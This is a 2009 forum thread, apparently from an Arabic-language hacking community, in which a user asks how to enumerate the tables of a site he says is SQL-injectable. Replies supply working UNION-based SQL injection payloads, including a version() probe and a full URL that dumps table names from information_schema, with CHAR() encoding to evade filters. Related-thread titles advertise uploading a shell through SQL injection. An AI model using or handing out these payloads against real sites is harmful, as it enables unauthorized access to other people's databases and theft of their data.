SQL INJECTION HELP

romeo_is_me · 09-20-2009, 04:12 AM

Hello all my friends

Plz i wanna ask :

i have a sql injectable site : i know the database name .. is there a way to know the tables name? thnx

المصدر: :: vBspiders Professional Network ::

Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC SQL INJECTION HELP

PASSEWORD · 09-20-2009, 04:52 AM

what is the version of the database 4 or 5

KaLa$nikoV · 09-24-2009, 01:04 AM

insert

اقتباس


	version()

in the error column

look if the number error is 5
we will insert version() lick this e.g

e.g

كود PHP:

  1,2,3,4,version(),6,7,8,9,10,11,12,13

sorry iam couldnt good in En

megainfo · 09-29-2009, 04:24 PM

http://www.site.com/index.php?id=1+u...chema=CHAR(100, 97, 116, 97, 98, 97, 115, 101, 40, 41)--

CHAR(100, 97, 116, 97, 98, 97, 115, 101, 40, 41)= databas()

megainfo · 09-29-2009, 04:27 PM

كود PHP:

  http://www.site.com/index.php?id=1+union+all+select+0,1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=CHAR(100, 97, 116, 97, 98, 97, 115, 101, 40, 41)--

كود PHP:

  CHAR(100, 97, 116, 97, 98, 97, 115, 101, 40, 41) = database()

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
Thumbs up into_outfile in SQL Injection شرح طريقة رفع شل عن طريق ثغرات SQL Injection	Black-FoG	SQL قواعد البيانات	73	03-14-2014 09:08 PM
ماهو الفرق بين SQL Injection و Blind SQL Injection	amer176	جـــ'ابات العناكــ'ب	6	10-04-2010 04:13 PM
SQL INJECTION	CODE3	Hackers Showoff	2	08-26-2010 02:47 PM
الحقن Sql Injection	virus_unknow	SQL قواعد البيانات	10	11-22-2009 01:10 AM

SQL INJECTION HELP

جـــ'ابات العناكــ'ب